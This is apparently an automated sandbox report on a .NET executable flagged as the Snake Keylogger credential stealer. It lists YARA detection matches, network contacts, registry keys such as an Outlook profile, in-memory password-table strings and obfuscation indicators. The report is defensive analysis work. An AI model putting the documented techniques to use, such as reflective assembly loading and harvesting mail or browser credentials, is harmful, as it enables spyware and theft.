Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49698 version: TLS 1.2

                System Summary

Source: 0.2.UFOiZapHGS.exe.4305e48.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.UFOiZapHGS.exe.4305e48.4.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.UFOiZapHGS.exe.4305e48.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.UFOiZapHGS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.UFOiZapHGS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.UFOiZapHGS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.UFOiZapHGS.exe.4305e48.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.UFOiZapHGS.exe.4305e48.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.UFOiZapHGS.exe.4305e48.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: UFOiZapHGS.exe PID: 6596, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: UFOiZapHGS.exe PID: 6812, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: UFOiZapHGS.exe, 00000000.00000002.909252970.00000000029FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs UFOiZapHGS.exe
Source: UFOiZapHGS.exe, 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs UFOiZapHGS.exe
Source: UFOiZapHGS.exe, 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs UFOiZapHGS.exe
Source: UFOiZapHGS.exe, 00000000.00000000.898021844.000000000034A000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamedWRC.exe, vs UFOiZapHGS.exe
Source: UFOiZapHGS.exe, 00000000.00000002.908295691.000000000087E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs UFOiZapHGS.exe
Source: UFOiZapHGS.exe, 00000000.00000002.913653665.000000000AF70000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs UFOiZapHGS.exe
Source: UFOiZapHGS.exe, 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs UFOiZapHGS.exe
Source: UFOiZapHGS.exe, 00000001.00000002.3356113743.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs UFOiZapHGS.exe
Source: UFOiZapHGS.exe | Binary or memory string: OriginalFilenamedWRC.exe, vs UFOiZapHGS.exe
Source: UFOiZapHGS.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.UFOiZapHGS.exe.4305e48.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.UFOiZapHGS.exe.4305e48.4.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.UFOiZapHGS.exe.4305e48.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.UFOiZapHGS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.UFOiZapHGS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.UFOiZapHGS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.UFOiZapHGS.exe.4305e48.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.UFOiZapHGS.exe.4305e48.4.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.UFOiZapHGS.exe.4305e48.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: UFOiZapHGS.exe PID: 6596, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: UFOiZapHGS.exe PID: 6812, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: UFOiZapHGS.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.UFOiZapHGS.exe.4305e48.4.raw.unpack, ----.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.UFOiZapHGS.exe.4305e48.4.raw.unpack, -K.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.UFOiZapHGS.exe.4305e48.4.raw.unpack, -K.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, tTG5u66bvje53TXubH.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, tTG5u66bvje53TXubH.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, h0lKaxk7KDkCXCFAkM.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, h0lKaxk7KDkCXCFAkM.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, h0lKaxk7KDkCXCFAkM.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, tTG5u66bvje53TXubH.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, tTG5u66bvje53TXubH.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, h0lKaxk7KDkCXCFAkM.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, h0lKaxk7KDkCXCFAkM.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, h0lKaxk7KDkCXCFAkM.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, tTG5u66bvje53TXubH.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, tTG5u66bvje53TXubH.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, h0lKaxk7KDkCXCFAkM.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, h0lKaxk7KDkCXCFAkM.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, h0lKaxk7KDkCXCFAkM.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
Source: C:\Users\user\Desktop\UFOiZapHGS.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\UFOiZapHGS.exe.log
Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Mutant created: NULL
Source: UFOiZapHGS.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002FE6000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002FB3000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002FA3000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002FF3000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: UFOiZapHGS.exe | Virustotal: Detection: 76%
Source: UFOiZapHGS.exe | ReversingLabs: Detection: 76%
Source: unknown | Process created: C:\Users\user\Desktop\UFOiZapHGS.exe "C:\Users\user\Desktop\UFOiZapHGS.exe"
Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Process created: C:\Users\user\Desktop\UFOiZapHGS.exe "C:\Users\user\Desktop\UFOiZapHGS.exe"
Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Sections loaded (first recorded sequence): mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, iconcodecservice.dll
Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Sections loaded (second recorded sequence): mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, sspicli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, dpapi.dll
Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\UFOiZapHGS.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: UFOiZapHGS.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: UFOiZapHGS.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: UFOiZapHGS.exe | Static file information: File size 1147904 > 1048576
Source: UFOiZapHGS.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x116400
Source: UFOiZapHGS.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Data Obfuscation

                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, h0lKaxk7KDkCXCFAkM.cs | .Net Code: bLqSokdB6L System.Reflection.Assembly.Load(byte[])
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, h0lKaxk7KDkCXCFAkM.cs | .Net Code: bLqSokdB6L System.Reflection.Assembly.Load(byte[])
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, h0lKaxk7KDkCXCFAkM.cs | .Net Code: bLqSokdB6L System.Reflection.Assembly.Load(byte[])
                Source: 0.2.UFOiZapHGS.exe.37ab0a8.0.raw.unpack, MainForm.cs | .Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.UFOiZapHGS.exe.378b088.1.raw.unpack, MainForm.cs | .Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Code function: 0_2_0598AE9A push dword ptr [edx+ebp*2-75h]; iretd 0_2_0598AEA7
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Code function: 0_2_07275978 push cs; ret 0_2_07275979
                Source: UFOiZapHGS.exe | Static PE information: section name: .text entropy: 7.767496510928698
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, z1kK0NZZgC0XJYbnPZ.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wSfU0qnPU3', 'a2LUBufKZ5', 'GZgUzdnWQX', 'lB5qH1hQed', 'RSuqAqwrGI', 'hxHqUJm9fW', 'tWGqq5vNFG', 'wLsMBHI2DY8iqSi3Buk'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, UtVPfr1lW3qEpb6TPt.cs | High entropy of concatenated method names: 'Mxg3dTGPfS', 'vSZ3RmJuOL', 'abTZaT5Z0V', 'cUSZFmWnmM', 'dkhZ7gQv3v', 'YYWZsFtv4L', 'g4bZPwtCKb', 'mrLZ8HZ2Mr', 'lyhZYA6rK9', 'oKTZWAcqw5'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, fLgG2NjKayBElw7pF6.cs | High entropy of concatenated method names: 'RlrZXGgiMF', 'mThZCUl661', 'uOxZ6NHIu7', 'lTTZj5IPvr', 'qQuZpwacEf', 'lJZZMgW2yf', 'qRsZIthEDI', 'OH4ZynHUJC', 'C5kZxQnj6I', 'Yi5ZEgi6B9'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, crEQIxYD98kSnOTwPV.cs | High entropy of concatenated method names: 'TO2twh0JGE', 'T6Ctca075y', 'cTgtoxsrYx', 'DH5tXVBQAT', 'UmJtdppDIJ', 'ILotCTGAQr', 'moxtRe3Z64', 'iCnt6hgUp5', 'QaotjSbI6b', 'c0ht1ydm1r'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, F53hZuviP6sCr447Mm.cs | High entropy of concatenated method names: 'KEvriw4YLk', 'xworGQWiJZ', 'T2Vr3YJsFR', 'kQ5rtOwQt9', 'uEJrkqeUoK', 'vs33VBKa0i', 'GDj3K8j11S', 'N7p3DZt0k6', 'A6Q3OidgCv', 'RhE30C0kaO'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, YRPcnen60xXs813G8l.cs | High entropy of concatenated method names: 'rXUQ6nXKG5', 'o3bQjI0K0s', 'EgWQvGRelX', 'tCDQ2nIL1E', 'f9vQFOSrZR', 'v78Q7X7vC7', 'V1EQPA0gKT', 'Un6Q8ncQPO', 'nPoQWltmyo', 'HjLQ5tQ38R'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, c3OKGSsH3otOS2iZPy.cs | High entropy of concatenated method names: 'o6VrNENlJ4', 'Q8YrLgeQJ1', 'U5HrVLtD5f', 'ToString', 'sbErKsfwCB', 'LI9rDoX0G9', 'zTUup72sviCdiyyLt13', 'FUtfm32cbF2lTHWlru6', 'Caugw42roSoAHUGl8RK'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, zooLG2D1NETVSuCcGH.cs | High entropy of concatenated method names: 'NmBxp3Z0XL', 't8DxIpn2mh', 'WyIxxXTt00', 'MO2xub3UL4', 'MoLxlTmpNS', 'VU9xJSnkoA', 'Dispose', 'ahaymnqgb9', 'KCdyGR9Yx0', 'o3UyZ4WhQP'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, ICRvmKAAcQHSY8gbpCE.cs | High entropy of concatenated method names: 'fxDEBNEmfY', 'V8rEzmSQJb', 'z6TuHnmarc', 'AsNuAELGqW', 'HJ8uU3XidO', 'lQjuqmVjNL', 'oUauSHHeJI', 'kxJuixIMhs', 'W4RumGPMLR', 'nlRuGi3uVq'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, EAvKHf0VSryQELm8rN.cs | High entropy of concatenated method names: 'CsKxv3mfhl', 'tSlx2NwHsv', 'FSvxaej5dr', 'IdLxFSTCxY', 'P4Nx7WsrIT', 'o0uxsg2S17', 'jlFxPJQuxO', 'fNYx8lRm21', 'nrLxY8KaQd', 'S17xW7yZdl'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, h0lKaxk7KDkCXCFAkM.cs | High entropy of concatenated method names: 'ASyqiEJqv8', 'jLLqmLRRLq', 'eoqqGH0dfl', 'D5LqZ2asyY', 'OWlq308cG8', 'KtxqrkJG6P', 'ipjqtclgob', 'Gwlqk4ldK5', 'OuIqfyChLB', 'VWcqbKh7qb'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, roFcEIUNPNfMFQtdu2.cs | High entropy of concatenated method names: 'W7koJii1S', 'jBrXD5D3n', 'orICbc1el', 'BUiRYZ8uP', 'x5wjuZfij', 'KpY1Dy5Uu', 'EkCXH3CsfGtlPSEVZq', 'oehIs5ETGHMae6MyIh', 'M8ryy3f92', 'KJfEQHQRx'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, asLAXfB6W5Ixa3Snel.cs | High entropy of concatenated method names: 'Q1LEZWIhqj', 'UQjE3CaSuy', 'PpREr8tbA9', 'fNyEtYGPcm', 'A60ExVr2TN', 'vBbEk4j7JB', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, PF5f0TGGGJmOPQqetg.cs | High entropy of concatenated method names: 'Dispose', 'sTVA0SuCcG', 'hLUU2rr41q', 'tvf7ZSMsuy', 'aIsABqeWKS', 'rXGAzjjd4i', 'ProcessDialogKey', 'S0jUHAvKHf', 'USrUAyQELm', 'LrNUUHsLAX'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, JDtUwoKuo75hSEnrug.cs | High entropy of concatenated method names: 'zieIOyTmVX', 'neNIBHvGtA', 'WT4yHXOisT', 'LOZyAkW50S', 'i0HI5S6tL7', 'evMI94QQVq', 'J8mInvUgUe', 'g3bIeMLaCt', 'gNYIg3QxNS', 'L3nINk91aF'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, noelrBAUQk7dBQSl2gY.cs | High entropy of concatenated method names: 'ToString', 'yMku6Yx4sf', 'Fn0ujM30Ao', 'rp4u1xikvR', 'ovNuvm8hDI', 'W1Gu2g8Zoj', 'iiOuafafRl', 'F5luFaDyQI', 'i45n7CbQqXd0JUVyU4x', 'Jrl2H9bMeEs8tNgWaHe'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, oumZYrSQJH8HN76im8.cs | High entropy of concatenated method names: 'fcuAtTG5u6', 'mvjAke53TX', 'SKaAbyBElw', 'JpFA46VtVP', 'm6TApPt153', 'wZuAMiP6sC', 'KVsaFdZLLG2DyGvymS', 'T2EfIf56drpwg4ZcKh', 'PP9AAQqBfB', 'fwSAq7cR1V'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, qPh7KmAHne0atqquLNL.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dR9E5BphVr', 'w5eE9092oh', 'K4iEntiWp5', 'rJUEeD9wbJ', 'Kr6Eget2dA', 'lqOENqoXhD', 'VdIEL8V7LJ'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, rYESTdeEVhin7mQVke.cs | High entropy of concatenated method names: 'WGWpWruvCG', 'Gmmp9WLpPI', 'nB7peYu14W', 'wEypgJcaLU', 'Dd1p2iJkmL', 'osApaxsqEe', 'OWupFHJZq4', 'MwRp7SQ2dH', 'Q8HpsCWIwJ', 'rRhpPOgTi1'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, YsRmyuNdGdZhXTNigh.cs | High entropy of concatenated method names: 'ToString', 'f17M5g9frc', 'wkTM2cajBi', 'CgjMayeyr2', 'IDYMFBUNJf', 'kKVM7TuWNI', 'kajMsDQhtu', 'qB4MPoPFYd', 'y7wM8Eq2Dj', 'tWKMYd4Xf6'
